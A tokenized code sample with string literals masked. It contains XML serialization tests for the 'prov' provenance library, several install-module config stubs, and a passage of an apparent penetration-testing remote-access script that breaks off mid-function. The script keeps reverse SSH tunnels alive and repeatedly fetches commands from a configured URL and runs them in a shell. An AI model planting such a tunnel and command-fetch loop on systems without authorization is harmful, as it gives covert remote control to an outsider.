<s> from __future__ import ( absolute_import , division , print_function , <EOL> unicode_literals ) <EOL> import difflib <EOL> import glob <EOL> import inspect <EOL> import io <EOL> from lxml import etree <EOL> import os <EOL> import unittest <EOL> import warnings <EOL> from prov . identifier import Namespace , QualifiedName <EOL> from prov . constants import PROV <EOL> import prov . model as prov <EOL> from prov . tests . test_model import AllTestsBase <EOL> from prov . tests . utility import RoundTripTestCase <EOL> EX_NS = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> EX_TR = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> DATA_PATH = os . path . join ( os . path . dirname ( os . path . abspath ( inspect . getfile ( <EOL> inspect . currentframe ( ) ) ) ) , "<STR_LIT>" ) <EOL> def remove_empty_tags ( tree ) : <EOL> if tree . text is not None and tree . text . strip ( ) == "<STR_LIT>" : <EOL> tree . text = None <EOL> for elem in tree : <EOL> if etree . iselement ( elem ) : <EOL> remove_empty_tags ( elem ) <EOL> def compare_xml ( doc1 , doc2 ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> doc1 . seek ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> except AttributeError : <EOL> pass <EOL> try : <EOL> doc2 . seek ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> except AttributeError : <EOL> pass <EOL> obj1 = etree . parse ( doc1 ) <EOL> obj2 = etree . parse ( doc2 ) <EOL> for c in obj1 . getroot ( ) . xpath ( "<STR_LIT>" ) : <EOL> p = c . getparent ( ) <EOL> p . remove ( c ) <EOL> for c in obj2 . getroot ( ) . xpath ( "<STR_LIT>" ) : <EOL> p = c . getparent ( ) <EOL> p . remove ( c ) <EOL> remove_empty_tags ( obj1 . getroot ( ) ) <EOL> remove_empty_tags ( obj2 . getroot ( ) ) <EOL> buf = io . BytesIO ( ) <EOL> obj1 . write_c14n ( buf ) <EOL> buf . seek ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> str1 = buf . read ( ) . decode ( ) <EOL> str1 = [ _i . strip ( ) for _i in str1 . splitlines ( ) if _i . strip ( ) ] <EOL> buf = io . BytesIO ( ) <EOL> obj2 . write_c14n ( buf ) <EOL> buf . seek ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> str2 = buf . read ( ) . decode ( ) <EOL> str2 = [ _i . strip ( ) for _i in str2 . splitlines ( ) if _i . strip ( ) ] <EOL> unified_diff = difflib . unified_diff ( str1 , str2 ) <EOL> err_msg = "<STR_LIT:\n>" . join ( unified_diff ) <EOL> if err_msg : <EOL> msg = "<STR_LIT>" <EOL> raise AssertionError ( msg + err_msg ) <EOL> class ProvXMLTestCase ( unittest . TestCase ) : <EOL> def test_serialization_example_6 ( self ) : <EOL> """<STR_LIT>""" <EOL> document = prov . ProvDocument ( ) <EOL> ex_ns = document . add_namespace ( * EX_NS ) <EOL> document . add_namespace ( * EX_TR ) <EOL> document . entity ( "<STR_LIT>" , ( <EOL> ( prov . PROV_TYPE , ex_ns [ "<STR_LIT>" ] ) , <EOL> ( "<STR_LIT>" , "<STR_LIT:2>" ) <EOL> ) ) <EOL> with io . BytesIO ( ) as actual : <EOL> document . serialize ( format = '<STR_LIT>' , destination = actual ) <EOL> compare_xml ( os . path . join ( DATA_PATH , "<STR_LIT>" ) , actual ) <EOL> def test_serialization_example_7 ( self ) : <EOL> """<STR_LIT>""" <EOL> document = prov . ProvDocument ( ) <EOL> document . add_namespace ( * EX_NS ) <EOL> document . activity ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , [ <EOL> ( prov . PROV_TYPE , prov . Literal ( "<STR_LIT>" , prov . XSD_QNAME ) ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ] ) <EOL> with io . BytesIO ( ) as actual : <EOL> document . serialize ( format = '<STR_LIT>' , destination = actual ) <EOL> compare_xml ( os . path . join ( DATA_PATH , "<STR_LIT>" ) , actual ) <EOL> def test_serialization_example_8 ( self ) : <EOL> """<STR_LIT>""" <EOL> document = prov . ProvDocument ( ) <EOL> document . add_namespace ( * EX_NS ) <EOL> e1 = document . entity ( "<STR_LIT>" ) <EOL> a1 = document . activity ( "<STR_LIT>" ) <EOL> document . wasGeneratedBy ( entity = e1 , activity = a1 , <EOL> time = "<STR_LIT>" , <EOL> other_attributes = { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> e2 = document . entity ( "<STR_LIT>" ) <EOL> document . wasGeneratedBy ( entity = e2 , activity = a1 , <EOL> time = "<STR_LIT>" , <EOL> other_attributes = { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> with io . BytesIO ( ) as actual : <EOL> document . serialize ( format = '<STR_LIT>' , destination = actual ) <EOL> compare_xml ( os . path . join ( DATA_PATH , "<STR_LIT>" ) , actual ) <EOL> def test_deserialization_example_6 ( self ) : <EOL> """<STR_LIT>""" <EOL> actual_doc = prov . ProvDocument . deserialize ( <EOL> source = os . path . join ( DATA_PATH , "<STR_LIT>" ) , <EOL> format = "<STR_LIT>" ) <EOL> expected_document = prov . ProvDocument ( ) <EOL> ex_ns = expected_document . add_namespace ( * EX_NS ) <EOL> expected_document . add_namespace ( * EX_TR ) <EOL> expected_document . entity ( "<STR_LIT>" , ( <EOL> ( prov . PROV_TYPE , ex_ns [ "<STR_LIT>" ] ) , <EOL> ( "<STR_LIT>" , "<STR_LIT:2>" ) <EOL> ) ) <EOL> self . assertEqual ( actual_doc , expected_document ) <EOL> def test_deserialization_example_7 ( self ) : <EOL> """<STR_LIT>""" <EOL> actual_doc = prov . ProvDocument . deserialize ( <EOL> source = os . path . join ( DATA_PATH , "<STR_LIT>" ) , <EOL> format = "<STR_LIT>" ) <EOL> expected_document = prov . ProvDocument ( ) <EOL> ex_ns = Namespace ( * EX_NS ) <EOL> expected_document . add_namespace ( ex_ns ) <EOL> expected_document . activity ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , [ <EOL> ( prov . PROV_TYPE , QualifiedName ( ex_ns , "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ] ) <EOL> self . assertEqual ( actual_doc , expected_document ) <EOL> def test_deserialization_example_04_and_05 ( self ) : <EOL> """<STR_LIT>""" <EOL> xml_string = """<STR_LIT>""" <EOL> with io . StringIO ( ) as xml : <EOL> xml . write ( xml_string ) <EOL> xml . seek ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> actual_document = prov . ProvDocument . deserialize ( source = xml , <EOL> format = "<STR_LIT>" ) <EOL> expected_document = prov . ProvDocument ( ) <EOL> ex_ns = Namespace ( * EX_NS ) <EOL> expected_document . add_namespace ( ex_ns ) <EOL> expected_document . add_namespace ( * EX_TR ) <EOL> expected_document . entity ( "<STR_LIT>" , ( <EOL> ( prov . PROV_TYPE , QualifiedName ( ex_ns , "<STR_LIT>" ) ) , <EOL> ( prov . PROV_TYPE , PROV [ "<STR_LIT>" ] ) ) ) <EOL> self . assertEqual ( actual_document , expected_document , "<STR_LIT>" ) <EOL> xml_string = """<STR_LIT>""" <EOL> with io . StringIO ( ) as xml : <EOL> xml . write ( xml_string ) <EOL> xml . seek ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> actual_document = prov . ProvDocument . deserialize ( source = xml , <EOL> format = "<STR_LIT>" ) <EOL> expected_document = prov . ProvDocument ( ) <EOL> expected_document . add_namespace ( * EX_NS ) <EOL> expected_document . add_namespace ( * EX_TR ) <EOL> expected_document . entity ( "<STR_LIT>" , ( <EOL> ( prov . PROV_TYPE , QualifiedName ( ex_ns , "<STR_LIT>" ) ) , <EOL> ( prov . PROV_TYPE , PROV [ "<STR_LIT>" ] ) , <EOL> ( prov . PROV_TYPE , PROV [ "<STR_LIT>" ] ) <EOL> ) ) <EOL> self . assertEqual ( actual_document , expected_document , "<STR_LIT>" ) <EOL> def test_other_elements ( self ) : <EOL> """<STR_LIT>""" <EOL> xml_string = """<STR_LIT>""" <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> warnings . simplefilter ( "<STR_LIT>" ) <EOL> with io . StringIO ( ) as xml : <EOL> xml . write ( xml_string ) <EOL> xml . seek ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> doc = prov . ProvDocument . deserialize ( source = xml , format = "<STR_LIT>" ) <EOL> self . assertEqual ( len ( w ) , <NUM_LIT:1> ) <EOL> self . assertTrue ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" in str ( w [ <NUM_LIT:0> ] . message ) ) <EOL> self . assertEqual ( len ( doc . _records ) , <NUM_LIT:0> ) <EOL> def test_nested_default_namespace ( self ) : <EOL> """<STR_LIT>""" <EOL> filename = os . path . join ( DATA_PATH , "<STR_LIT>" ) <EOL> doc = prov . ProvDocument . deserialize ( source = filename , format = "<STR_LIT>" ) <EOL> ns = Namespace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( len ( doc . _records ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( doc . get_default_namespace ( ) , ns ) <EOL> self . assertEqual ( doc . _records [ <NUM_LIT:0> ] . identifier . namespace , ns ) <EOL> self . assertEqual ( doc . _records [ <NUM_LIT:0> ] . identifier . localpart , "<STR_LIT>" ) <EOL> def test_redefining_namespaces ( self ) : <EOL> """<STR_LIT>""" <EOL> filename = os . path . join ( DATA_PATH , <EOL> "<STR_LIT>" ) <EOL> doc = prov . ProvDocument . deserialize ( source = filename , format = "<STR_LIT>" ) <EOL> self . assertEqual ( len ( doc . _records ) , <NUM_LIT:1> ) <EOL> ns = Namespace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( doc . _records [ <NUM_LIT:0> ] . attributes [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] . namespace , ns ) <EOL> filename = os . path . join ( DATA_PATH , "<STR_LIT>" ) <EOL> doc = prov . ProvDocument . deserialize ( source = filename , format = "<STR_LIT>" ) <EOL> new_ns = doc . _records [ <NUM_LIT:0> ] . attributes [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] . namespace <EOL> self . assertNotEqual ( new_ns , ns ) <EOL> self . assertEqual ( new_ns . uri , "<STR_LIT>" ) <EOL> class ProvXMLRoundTripFromFileTestCase ( unittest . TestCase ) : <EOL> def _perform_round_trip ( self , filename , force_types = False ) : <EOL> document = prov . ProvDocument . deserialize ( <EOL> source = filename , format = "<STR_LIT>" ) <EOL> with io . BytesIO ( ) as new_xml : <EOL> document . serialize ( format = '<STR_LIT>' , destination = new_xml , <EOL> force_types = force_types ) <EOL> compare_xml ( filename , new_xml ) <EOL> for filename in glob . iglob ( os . path . join ( <EOL> DATA_PATH , "<STR_LIT:*>" + os . path . extsep + "<STR_LIT>" ) ) : <EOL> name = os . path . splitext ( os . path . basename ( filename ) ) [ <NUM_LIT:0> ] <EOL> test_name = "<STR_LIT>" % name <EOL> if name in ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) : <EOL> continue <EOL> def get_fct ( f ) : <EOL> if name in [ "<STR_LIT>" ] : <EOL> force_types = True <EOL> else : <EOL> force_types = False <EOL> def fct ( self ) : <EOL> self . _perform_round_trip ( f , force_types = force_types ) <EOL> return fct <EOL> fct = get_fct ( filename ) <EOL> fct . __name__ = str ( test_name ) <EOL> class RoundTripXMLTests ( RoundTripTestCase , AllTestsBase ) : <EOL> FORMAT = '<STR_LIT>' <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> AUTHOR = "<STR_LIT>" <EOL> DESCRIPTION = "<STR_LIT>" <EOL> INSTALL_TYPE = "<STR_LIT>" <EOL> REPOSITORY_LOCATION = "<STR_LIT>" <EOL> INSTALL_LOCATION = "<STR_LIT>" <EOL> DEBIAN = "<STR_LIT>" <EOL> FEDORA = "<STR_LIT>" <EOL> AFTER_COMMANDS = "<STR_LIT>" <EOL> LAUNCHER = "<STR_LIT>" </s>
<s> AUTHOR = "<STR_LIT>" <EOL> DESCRIPTION = "<STR_LIT>" <EOL> INSTALL_TYPE = "<STR_LIT>" <EOL> REPOSITORY_LOCATION = "<STR_LIT>" <EOL> INSTALL_LOCATION = "<STR_LIT>" <EOL> DEBIAN = "<STR_LIT>" <EOL> FEDORA = "<STR_LIT>" <EOL> AFTER_COMMANDS = "<STR_LIT>" <EOL> LAUNCHER = "<STR_LIT>" </s>
<s> AUTHOR = "<STR_LIT>" <EOL> DESCRIPTION = "<STR_LIT>" <EOL> INSTALL_TYPE = "<STR_LIT>" <EOL> REPOSITORY_LOCATION = "<STR_LIT>" <EOL> INSTALL_LOCATION = "<STR_LIT>" <EOL> DEBIAN = "<STR_LIT>" <EOL> FEDORA = "<STR_LIT>" <EOL> BYPASS_UPDATE = "<STR_LIT>" <EOL> AFTER_COMMANDS = "<STR_LIT>" <EOL> LAUNCHER = "<STR_LIT>" </s>
<s> AUTHOR = "<STR_LIT>" <EOL> DESCRIPTION = "<STR_LIT>" <EOL> INSTALL_TYPE = "<STR_LIT>" <EOL> REPOSITORY_LOCATION = "<STR_LIT>" <EOL> INSTALL_LOCATION = "<STR_LIT>" <EOL> DEBIAN = "<STR_LIT>" <EOL> FEDORA = "<STR_LIT>" <EOL> ARCHLINUX = "<STR_LIT>" <EOL> AFTER_COMMANDS = "<STR_LIT>" <EOL> LAUNCHER = "<STR_LIT>" </s>
<s> import re <EOL> import sys <EOL> import subprocess <EOL> import time <EOL> import os <EOL> import pexpect <EOL> from Crypto . Cipher import AES <EOL> import base64 <EOL> import urllib2 <EOL> import hashlib <EOL> import platform <EOL> import urllib2 <EOL> def encryptAES ( data ) : <EOL> PADDING = '<STR_LIT:{>' <EOL> BLOCK_SIZE = <NUM_LIT:32> <EOL> pad = lambda s : s + ( BLOCK_SIZE - len ( s ) % BLOCK_SIZE ) * PADDING <EOL> a = <NUM_LIT:50> * <NUM_LIT:5> <EOL> EncodeAES = lambda c , s : base64 . b64encode ( c . encrypt ( pad ( s ) ) ) <EOL> secret = os . urandom ( BLOCK_SIZE ) <EOL> cipher = AES . new ( secret ) <EOL> aes = EncodeAES ( cipher , data ) <EOL> fileopen = file ( "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> config = "<STR_LIT>" <EOL> for line in fileopen : <EOL> line = line . rstrip ( ) <EOL> if "<STR_LIT>" in line : <EOL> line = "<STR_LIT>" + str ( aes ) <EOL> config = config + line + "<STR_LIT:\n>" <EOL> secret = base64 . b64encode ( secret ) <EOL> filewrite = file ( "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> filewrite . write ( secret ) <EOL> filewrite . close ( ) <EOL> filewrite = file ( "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> filewrite . write ( config ) <EOL> filewrite . close ( ) <EOL> subprocess . Popen ( "<STR_LIT>" , stdout = subprocess . PIPE , stderr = subprocess . PIPE , shell = True ) . wait ( ) <EOL> def decryptAES ( data ) : <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> PADDING = '<STR_LIT:{>' <EOL> BLOCK_SIZE = <NUM_LIT:32> <EOL> pad = lambda s : s + ( BLOCK_SIZE - len ( s ) % BLOCK_SIZE ) * PADDING <EOL> a = <NUM_LIT:50> * <NUM_LIT:5> <EOL> DecodeAES = lambda c , e : c . decrypt ( base64 . b64decode ( e ) ) . rstrip ( PADDING ) <EOL> fileopen = file ( "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> key = fileopen . read ( ) <EOL> secret = base64 . b64decode ( key ) <EOL> cipher = AES . new ( secret ) <EOL> aes = DecodeAES ( cipher , data ) <EOL> return str ( aes ) <EOL> else : return "<STR_LIT>" <EOL> def check_debian ( ) : <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> return "<STR_LIT>" <EOL> else : <EOL> print "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> def check_keepalive ( ) : <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> fileopen = file ( "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> data = fileopen . read ( ) <EOL> match = re . search ( "<STR_LIT>" , data ) <EOL> if not match : <EOL> print "<STR_LIT>" <EOL> filewrite = file ( "<STR_LIT>" , "<STR_LIT:a>" ) <EOL> filewrite . write ( "<STR_LIT>" ) <EOL> filewrite . write ( "<STR_LIT>" ) <EOL> filewrite . close ( ) <EOL> def ssh_start ( ) : <EOL> subprocess . Popen ( "<STR_LIT>" , stdout = subprocess . PIPE , stderr = subprocess . PIPE , shell = True ) . wait ( ) <EOL> subprocess . Popen ( "<STR_LIT>" , stdout = subprocess . PIPE , stderr = subprocess . PIPE , shell = True ) . wait ( ) <EOL> def update ( ) : <EOL> socks = check_config ( "<STR_LIT>" ) <EOL> if socks != "<STR_LIT>" : <EOL> while <NUM_LIT:1> : <EOL> proc = subprocess . Popen ( '<STR_LIT>' % ( socks ) , stdout = subprocess . PIPE , stderr = subprocess . PIPE , shell = True ) <EOL> stdout_value = proc . stdout . read ( ) <EOL> if not "<STR_LIT>" in stdout_value : <EOL> time . sleep ( <NUM_LIT:20> ) <EOL> else : break <EOL> while <NUM_LIT:1> : <EOL> print "<STR_LIT>" <EOL> subprocess . Popen ( "<STR_LIT>" , stdout = subprocess . PIPE , stderr = subprocess . PIPE , shell = True ) . wait ( ) <EOL> print "<STR_LIT>" <EOL> subprocess . Popen ( "<STR_LIT>" , stdout = subprocess . PIPE , stderr = subprocess . PIPE , shell = True ) . wait ( ) <EOL> print "<STR_LIT>" <EOL> time . sleep ( <NUM_LIT> ) <EOL> def proxychain ( ) : <EOL> socks = check_config ( "<STR_LIT>" ) <EOL> if socks != "<STR_LIT>" : <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> os . remove ( "<STR_LIT>" ) <EOL> filewrite = file ( "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> filewrite . write ( "<STR_LIT>" % ( socks ) ) <EOL> filewrite . close ( ) <EOL> def tap_update ( ) : <EOL> auto_update = check_config ( "<STR_LIT>" ) <EOL> if auto_update == "<STR_LIT>" : <EOL> print "<STR_LIT>" <EOL> updates = check_config ( "<STR_LIT>" ) <EOL> if not os . path . isdir ( "<STR_LIT>" ) : <EOL> subprocess . Popen ( "<STR_LIT>" , shell = True ) . wait ( ) <EOL> os . chdir ( "<STR_LIT>" ) <EOL> subprocess . Popen ( updates , stdout = subprocess . PIPE , stderr = subprocess . PIPE , shell = True ) . wait ( ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> def check_config_path ( ) : <EOL> path = "<STR_LIT>" <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> path = "<STR_LIT>" <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> path = "<STR_LIT>" <EOL> return path <EOL> def check_config ( param ) : <EOL> path = check_config_path ( ) <EOL> fileopen = file ( path , "<STR_LIT:r>" ) <EOL> counter = <NUM_LIT:0> <EOL> for line in fileopen : <EOL> if not line . startswith ( "<STR_LIT:#>" ) : <EOL> match = re . search ( param , line ) <EOL> if match : <EOL> line = line . rstrip ( ) <EOL> line = line . replace ( '<STR_LIT:">' , "<STR_LIT>" ) <EOL> line = line . split ( "<STR_LIT:=>" , <NUM_LIT:1> ) <EOL> return line [ <NUM_LIT:1> ] <EOL> counter = <NUM_LIT:1> <EOL> if counter == <NUM_LIT:0> : <EOL> return "<STR_LIT>" <EOL> def ssh_run ( ) : <EOL> subprocess . Popen ( "<STR_LIT>" , shell = True ) . wait ( ) <EOL> username = check_config ( "<STR_LIT>" ) <EOL> password = check_config ( "<STR_LIT>" ) <EOL> password = decryptAES ( password ) . rstrip ( ) <EOL> port = check_config ( "<STR_LIT>" ) <EOL> host = check_config ( "<STR_LIT>" ) <EOL> localport = check_config ( "<STR_LIT>" ) <EOL> interval = check_config ( "<STR_LIT>" ) <EOL> interval = int ( interval ) <EOL> proxychain ( ) <EOL> ssh_gen = check_config ( "<STR_LIT>" ) <EOL> ssh_commands = "<STR_LIT>" <EOL> if ssh_gen . lower ( ) == "<STR_LIT>" : <EOL> ssh_commands = "<STR_LIT>" <EOL> try : <EOL> child = pexpect . spawn ( "<STR_LIT>" ) <EOL> i = child . expect ( [ '<STR_LIT>' ] ) <EOL> if i == <NUM_LIT:0> : <EOL> child . sendline ( password ) <EOL> child . close ( ) <EOL> except : pass <EOL> print "<STR_LIT>" <EOL> proc = subprocess . Popen ( "<STR_LIT>" % ( port ) , stdout = subprocess . PIPE , stderr = subprocess . PIPE , shell = True ) <EOL> stdout_value = proc . communicate ( ) [ <NUM_LIT:0> ] <EOL> stdout_value = stdout_value . split ( "<STR_LIT:U+0020>" ) <EOL> for line in stdout_value : <EOL> if "<STR_LIT>" in line : <EOL> print "<STR_LIT>" <EOL> line = line . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> subprocess . Popen ( "<STR_LIT>" + line , stdout = subprocess . PIPE , stderr = subprocess . PIPE , shell = True ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" + host + "<STR_LIT>" + port <EOL> subprocess . Popen ( "<STR_LIT>" , stdout = subprocess . PIPE , stderr = subprocess . PIPE , shell = True ) . wait ( ) <EOL> child = pexpect . spawn ( "<STR_LIT>" % ( localport , username , host , port , ssh_commands ) ) <EOL> i = child . expect ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if i == <NUM_LIT:0> : <EOL> child . sendline ( password ) <EOL> if i == <NUM_LIT:1> : <EOL> child . sendline ( "<STR_LIT:yes>" ) <EOL> if password != "<STR_LIT>" : <EOL> child . expect ( [ '<STR_LIT>' ] ) <EOL> child . sendline ( password ) <EOL> if i == <NUM_LIT:2> : <EOL> print "<STR_LIT>" <EOL> time . sleep ( <NUM_LIT> ) <EOL> while <NUM_LIT:1> : <EOL> print "<STR_LIT>" <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> try : <EOL> portcheck = pexpect . spawn ( '<STR_LIT>' % ( port , ssh_commands , username , host , localport ) ) <EOL> i = portcheck . expect ( [ '<STR_LIT>' , '<STR_LIT>' , localport ] ) <EOL> if i == <NUM_LIT:0> : <EOL> portcheck . sendline ( password ) <EOL> if i == <NUM_LIT:1> : <EOL> portcheck . sendline ( "<STR_LIT:yes>" ) <EOL> if password != "<STR_LIT>" : <EOL> portcheck . expect ( "<STR_LIT:password>" ) <EOL> portcheck . sendline ( password ) <EOL> if i == <NUM_LIT:2> : <EOL> portcheck . sendline ( "<STR_LIT>" ) <EOL> i = portcheck . expect ( [ localport , "<STR_LIT>" ] ) <EOL> if i == <NUM_LIT:0> : <EOL> portcheck . sendline ( "<STR_LIT>" ) <EOL> if i == <NUM_LIT:1> : <EOL> pass <EOL> except : <EOL> print "<STR_LIT>" <EOL> subprocess . Popen ( "<STR_LIT>" , stdout = subprocess . PIPE , stderr = subprocess . PIPE , shell = True ) <EOL> child = pexpect . spawn ( "<STR_LIT>" % ( localport , username , host , port , ssh_commands ) ) <EOL> i = child . expect ( [ '<STR_LIT>' , '<STR_LIT>' , localport ] ) <EOL> if i == <NUM_LIT:0> : <EOL> child . sendline ( password ) <EOL> if i == <NUM_LIT:1> : <EOL> child . sendline ( "<STR_LIT:yes>" ) <EOL> if password != "<STR_LIT>" : <EOL> child . expect ( "<STR_LIT>" ) <EOL> child . sendline ( password ) <EOL> if i == <NUM_LIT:2> : <EOL> child . sendline ( "<STR_LIT>" ) <EOL> print "<STR_LIT>" <EOL> socks = check_config ( "<STR_LIT>" ) . rstrip ( ) <EOL> if socks != "<STR_LIT>" : <EOL> proc = subprocess . Popen ( '<STR_LIT>' % ( socks ) , stdout = subprocess . PIPE , stderr = subprocess . PIPE , shell = True ) <EOL> stdout_value = proc . stdout . read ( ) <EOL> if not "<STR_LIT>" in stdout_value : <EOL> print "<STR_LIT>" <EOL> try : <EOL> child1 = pexpect . spawn ( "<STR_LIT>" % ( socks , username , host , port , ssh_commands ) ) <EOL> i = child1 . expect ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if i == <NUM_LIT:0> : <EOL> child1 . sendline ( password ) <EOL> if i == <NUM_LIT:1> : <EOL> child1 . sendline ( "<STR_LIT:yes>" ) <EOL> if password != "<STR_LIT>" : <EOL> child1 . expect ( "<STR_LIT>" ) <EOL> child1 . sendline ( password ) <EOL> if i == <NUM_LIT:2> : pass <EOL> except Exception , e : <EOL> print e <EOL> print ( "<STR_LIT>" ) <EOL> pass <EOL> time . sleep ( interval ) <EOL> def execute_command ( ) : <EOL> commands = <NUM_LIT:0> <EOL> while <NUM_LIT:1> : <EOL> try : <EOL> print "<STR_LIT>" <EOL> url = check_config ( "<STR_LIT>" ) <EOL> if url != "<STR_LIT>" : <EOL> try : <EOL> req = urllib2 . Request ( url ) <EOL> html = urllib2 . urlopen ( req ) . read ( ) <EOL> if "<STR_LIT>" in html or "<STR_LIT>" : <EOL> commands = <NUM_LIT:0> <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> filewrite = file ( "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> filewrite . write ( html ) <EOL> filewrite . close ( ) <EOL> fileopen1 = file ( "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> fileopen2 = file ( "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> data1 = fileopen1 . read ( ) <EOL> data2 = fileopen2 . read ( ) <EOL> hash = hashlib . sha512 ( ) <EOL> hash . update ( data1 ) <EOL> hash1 = hash . hexdigest ( ) <EOL> hash = hashlib . sha512 ( ) <EOL> hash . update ( data2 ) <EOL> hash2 = hash . hexdigest ( ) <EOL> if hash1 != hash2 : commands = <NUM_LIT:1> <EOL> if not os . path . isfile ( "<STR_LIT>" ) or commands == <NUM_LIT:1> : <EOL> print "<STR_LIT>" <EOL> filewrite = file ( "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> filewrite . write ( html ) <EOL> filewrite . close ( ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> fileopen = file ( "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> for line in fileopen : <EOL> line = line . rstrip ( ) <EOL> if line != "<STR_LIT>" : <EOL> if line != "<STR_LIT>" : <EOL> subprocess . Popen ( line , shell = True ) . wait ( ) <EOL> except : pass <EOL> if commands == <NUM_LIT:1> : <EOL> print "<STR_LIT>" <EOL> else : <EOL> print "<STR_LIT>" <EOL> time . sleep ( <NUM_LIT> ) <EOL> if url == "<STR_LIT>" : <EOL> time . sleep ( <NUM_LIT> ) <EOL> except : pass <EOL> def ssh_keygen ( passphrase ) : <EOL> print "<STR_LIT>" <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> print "<STR_LIT>" <EOL> os . remove ( "<STR_LIT>" ) <EOL> os . remove ( "<STR_LIT>" ) <EOL> print "<STR_LIT>" <EOL> passphrase = passphrase . rstrip ( ) <EOL> child = pexpect . spawn ( "<STR_LIT>" ) <EOL> child . expect ( "<STR_LIT>" ) <EOL> child . sendline ( "<STR_LIT>" ) <EOL> print "<STR_LIT>" <EOL> child . sendline ( passphrase ) <EOL> child . expect ( "<STR_LIT>" ) <EOL> child . sendline ( passphrase ) <EOL> print "<STR_LIT>" <EOL> child . sendline ( "<STR_LIT>" ) <EOL> print "<STR_LIT>" <EOL> def download_file ( url ) : <EOL> file_name = url . split ( '<STR_LIT:/>' ) [ - <NUM_LIT:1> ] <EOL> u = urllib2 . urlopen ( url ) <EOL> f = open ( file_name , '<STR_LIT:wb>' ) <EOL> meta = u . info ( ) <EOL> file_size = int ( meta . getheaders ( "<STR_LIT>" ) [ <NUM_LIT:0> ] ) <EOL> print "<STR_LIT>" % ( file_name , file_size ) <EOL> file_size_dl = <NUM_LIT:0> <EOL> block_sz = <NUM_LIT> <EOL> while True : <EOL> buffer = u . read ( block_sz ) <EOL> if not buffer : <EOL> break <EOL> file_size_dl += len ( buffer ) <EOL> f . write ( buffer ) <EOL> status = r"<STR_LIT>" % ( file_size_dl , file_size_dl * <NUM_LIT> / file_size ) <EOL> status = status + chr ( <NUM_LIT:8> ) * ( len ( status ) + <NUM_LIT:1> ) <EOL> print status , <EOL> f . close ( ) <EOL> def check_os ( ) : <EOL> osversion = platform . architecture ( ) [ <NUM_LIT:0> ] <EOL> if osversion == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return "<STR_LIT>" <EOL> def motd ( client ) : <EOL> print ( "<STR_LIT>" ) <EOL> data = file ( "<STR_LIT>" , "<STR_LIT:rb>" ) . read ( ) <EOL> filewrite = file ( "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> filewrite . write ( data ) <EOL> filewrite . write ( "<STR_LIT>" % ( client ) ) <EOL> filewrite . close ( ) <EOL> print ( "<STR_LIT>" ) <EOL> def log_everything ( ) : <EOL> log = check_config ( "<STR_LIT>" ) <EOL> if log == None : <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> filewrite = file ( "<STR_LIT>" , "<STR_LIT:a>" ) <EOL> filewrite . write ( "<STR_LIT>" ) <EOL> filewrite . close ( ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> log = check_config ( "<STR_LIT>" ) <EOL> if log . lower ( ) == "<STR_LIT:yes>" : <EOL> data = file ( "<STR_LIT>" , "<STR_LIT:r>" ) . read ( ) <EOL> if """<STR_LIT>""" in data : <EOL> print "<STR_LIT>" <EOL> else : <EOL> print "<STR_LIT>" <EOL> filewrite = file ( "<STR_LIT>" , "<STR_LIT:a>" ) <EOL> filewrite . write ( """<STR_LIT>""" ) <EOL> filewrite . close ( ) <EOL> print "<STR_LIT>" <EOL> if log . lower ( ) == "<STR_LIT>" : <EOL> fileopen = file ( "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> data = fileopen . read ( ) <EOL> if 